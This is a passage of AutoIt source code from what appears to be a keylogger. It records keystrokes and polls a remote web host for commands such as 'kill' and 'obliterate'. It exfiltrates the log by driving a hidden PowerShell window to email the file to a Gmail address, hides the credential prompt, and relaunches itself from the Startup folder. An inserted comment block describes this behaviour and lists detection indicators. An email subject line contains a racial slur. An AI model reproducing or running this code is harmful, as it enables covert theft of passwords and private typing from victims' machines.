  692. _LogKeyPress(" ")
  693. EndIf
  694.  
  695.  
  696. If _IsPressed('08',$Dllcall) Then
  697. _LogKeyPress("{BACKSPACE}")
  698. EndIf
  699.  
  700.  
  701. If _IsPressed('09',$Dllcall) Then
  702. _LogKeyPress("{TAB}")
  703. EndIf
  704.  
  705.  
  706. If _IsPressed('0d',$Dllcall) Then
  707. _LogKeyPress("{ENTER}")
  708. EndIf
  709.  
  710. If _IsPressed('10',$Dllcall) Then
  711.  
  712. _LogKeyPress("{SHIFT}")
  713.  
  714. While _IsPressed("10")
  715.  
  716. If _IsPressed('BA',$Dllcall) Then
  717. _LogKeyPress(";")
  718. ElseIf _IsPressed('BB',$Dllcall) Then
  719. _LogKeyPress("+")
  720. ElseIf _IsPressed('BC',$Dllcall) Then
  721. _LogKeyPress("<")
  722. ElseIf _IsPressed('BD',$Dllcall) Then
  723. _LogKeyPress("_")
  724. ElseIf _IsPressed('BE',$Dllcall) Then
  725. _LogKeyPress(">")
  726. ElseIf _IsPressed('BF',$Dllcall) Then
  727. _LogKeyPress("?")
  728. ElseIf _IsPressed('DB',$Dllcall) Then
  729. _LogKeyPress("{")
  730. ElseIf _IsPressed('DC',$Dllcall) Then
  731. _LogKeyPress("|")
  732. ElseIf _IsPressed('DD',$Dllcall) Then
  733. _LogKeyPress("}")
  734. ElseIf _IsPressed('30',$Dllcall) Then
  735. _LogKeyPress(")")
  736. ElseIf _IsPressed('31',$Dllcall) Then
  737. _LogKeyPress("!")
  738. ElseIf _IsPressed('32',$Dllcall) Then
  739. _LogKeyPress("@")
  740. ElseIf _IsPressed('33',$Dllcall) Then
  741. _LogKeyPress("#")
  742. ElseIf _IsPressed('34',$Dllcall) Then
  743. _LogKeyPress("$")
  744. ElseIf _IsPressed('35',$Dllcall) Then
  745. _LogKeyPress("%")
  746. ElseIf _IsPressed('36',$Dllcall) Then
  747. _LogKeyPress("^")
  748. ElseIf _IsPressed('37',$Dllcall) Then
  749. _LogKeyPress("&")
  750. ElseIf _IsPressed('38',$Dllcall) Then
  751. _LogKeyPress("*")
  752. ElseIf _IsPressed('39',$Dllcall) Then
  753. _LogKeyPress("(")
  754.  
  755. EndIf
  756.  
  757. Sleep(10) ; important to prevent 100% CPU usage in this tight little loop
  758. WEnd
  759. EndIf
  760.  
  761. If _IsPressed('14',$Dllcall) Then
  762. _LogKeyPress("{CAPSLOCK}")
  763. EndIf
  764.  
  765.  
  766. If _IsPressed('1b',$Dllcall) Then
  767. _LogKeyPress("{ESC}")
  768. EndIf
  769.  
  770. If _IsPressed('23',$Dllcall) Then
  771. _LogKeyPress("{END}")
  772. EndIf
  773.  
  774.  
  775. If _IsPressed('24',$Dllcall) Then
  776. _LogKeyPress("{HOME}")
  777. EndIf
  778.  
  779.  
  780. If _IsPressed('25',$Dllcall) Then
  781. _LogKeyPress("{LEFT ARROW}")
  782. EndIf
  783.  
  784.  
  785. If _IsPressed('26',$Dllcall) Then
  786. _LogKeyPress("{UP ARROW}")
  787. EndIf
  788.  
  789.  
  790. If _IsPressed('27',$Dllcall) Then
  791. _LogKeyPress("{RIGHT ARROW}")
  792. EndIf
  793.  
  794.  
  795. If _IsPressed('28',$Dllcall) Then
  796. _LogKeyPress("{DOWN ARROW}")
  797. EndIf
  798.  
  799.  
  800.  
  801. If _IsPressed('2e',$Dllcall) Then
  802. _LogKeyPress("{DEL}")
  803. EndIf
  804.  
  805. If _IsPressed('BA',$Dllcall) Then
  806. _LogKeyPress(";")
  807. EndIf
  808.  
  809.  
  810. If _IsPressed('BB',$Dllcall) Then
  811. _LogKeyPress("=")
  812. Mail()
  813. EndIf
  814.  
  815.  
  816. If _IsPressed('BC',$Dllcall) Then
  817. _LogKeyPress(",")
  818. EndIf
  819.  
  820.  
  821. If _IsPressed('BD',$Dllcall) Then
  822. _LogKeyPress("-")
  823. EndIf
  824.  
  825.  
  826. If _IsPressed('BE',$Dllcall) Then
  827. _LogKeyPress(".")
  828. EndIf
  829.  
  830.  
  831. If _IsPressed('BF',$Dllcall) Then
  832. _LogKeyPress("/")
  833. EndIf
  834.  
  835.  
  836. If _IsPressed('DB',$Dllcall) Then
  837. _LogKeyPress("[")
  838. EndIf
  839.  
  840. If _IsPressed('DC',$Dllcall) Then
  841. _LogKeyPress("\")
  842. EndIf
  843.  
  844. If _IsPressed('DD',$Dllcall) Then
  845. _LogKeyPress("]")
  846. EndIf
  847. $num = $num + 1
  848. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  849. $stage = 0;
  850. Mail()
  851. Send("=")
  852. EndIf
  853. $num = $num + 1
  854. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "dumpkeyscan" Then
  855. Send("=")
  856. Mail()
  857. EndIf
  858. $num = $num + 1
  859. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  860. ProcessClose("cmd.exe")
  861. ProcessClose("powershell.exe")
  862. ProcessClose($exename)
  863. Exit 0
  864.  
  865.  
  866. EndIf
  867. ;
  868. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  869.  
  870. ProcessClose("cmd.exe")
  871. ProcessClose("powershell.exe")
  872. FileDelete(@StartupDir & "/" & $exename)
  873. ProcessClose($exename)
  874. EndIf
  875. ;Global $filecontent = FileRead($log)
  876.  
  877. ;Global $mouseposition = MouseGetPos()
  878. ;Sleep(300000)
  879. ;Global $mousepositios = MouseGetPos()
  880. ;if $mouseposition == $mousepositios Then
  881. ; Run("cmd.exe")
  882. ; Sleep(100)
  883. ;Send("Start Powershell")
  884. ;Send("{ENTER}")
  885. ;Sleep(3000)
  886. ;Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  887. ;Send($filecontent);
  888. ;FileClose($file)
  889. ;Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  890. ;Send(" -Attachments ")
  891. ;Send(@scriptdir)
  892.  
  893. ;Send("/log/logfiles")
  894. ;Send($date)
  895. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  896.  
  897. ;Send("{ENTER}")
  898. ;Sleep(2000)
  899. ;Send("pass");
  900.  
  901. ;Send("{ENTER}")
  902. ;FileOpen($log)
  903. ;Sleep(30000)
  904.  
  905. ; EndIf
  906.  
  907. ;=======================================================================================
  908.  
  909. WEnd
  ; Exfiltrates the keystroke log by e-mail.
  ; When two MouseGetPos() readings taken 300 ms apart compare equal, starts
  ; powershell.exe, hides its window and uses ControlSend to type a
  ; Send-MailMessage command that attaches
  ; <script dir>/log/logfiles<date>.htm and relays it through
  ; smtp.gmail.com:587; the credential prompt (matched by its Portuguese window
  ; title) is hidden and the literal text "pass" is typed into it. The function
  ; also polls the server for "kill", "obliterate" and "returnzero". At the end
  ; of the loop body it deletes the log file, starts the Startup-folder copy of
  ; the client and exits the current process.
  ; Detection: powershell.exe started by the client with no visible window;
  ; outbound SMTP submission (TCP 587) from a workstation; PowerShell
  ; script-block logging records the typed Send-MailMessage command; the log
  ; file disappearing right after the mail attempt.
  910. Func Mail()
  911. while(true)
  912. Global $mouseposition = MouseGetPos()
  913. Sleep(300)
  914. Global $mousepositios = MouseGetPos()
  915. if $mouseposition == $mousepositios Then
  916. Run("powershell.exe")
  917. WinWait("Windows PowerShell")
  918. WinSetState("Windows PowerShell", "", @SW_HIDE)
  919.  
  920.  
  921. ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  922. ;Send($filecontent);
  923. FileClose($file)
  924. ControlSend("Windows PowerShell","", "","-SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  925. ControlSend("Windows PowerShell","", ""," -Attachments ")
  926. ControlSend("Windows PowerShell","", "",@scriptdir)
  927.  
  928. ControlSend("Windows PowerShell","", "","/log/logfiles")
  929. ControlSend("Windows PowerShell","", "",$date)
  930. ControlSend("Windows PowerShell","", "",".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  931.  
  932. ControlSend("Windows PowerShell","", "","{ENTER}")
  933.  
  934. WinWait("Solicitação de credenciais do Windows PowerShell")
  935. WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
  936. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
  937.  
  938. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
  939.  
  940. ;Send("{ENTER}")
  941. ;FileOpen($log)
  942. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  943. ProcessClose("cmd.exe")
  944. ProcessClose("powershell.exe")
  945. ProcessClose($exename)
  946. Exit 0
  947.  
  948.  
  949. EndIf
  950. ;
  951. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  952.  
  953. ProcessClose("cmd.exe")
  954. ProcessClose("powershell.exe")
  955. FileDelete(@StartupDir & "/" & $exename)
  956. ProcessClose($exename)
  957. EndIf
  958. Sleep(10000)
  959. ProcessClose("cmd.exe")
  960. ProcessClose("Powershell.exe")
  961. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  962. $stage = 0;
  963.  
  964. EndIf
  965. Sleep(30000)
  966.  
  967. EndIf
  968. FileDelete(@scriptdir & "/log/logfiles" & $date & ".htm")
  969. Run( @startupdir & "/" & $exename)
  970. Exit 0
  971. WEnd
  972. EndFunc
  973.  
  974. ;WEnd
  975. ;WEnd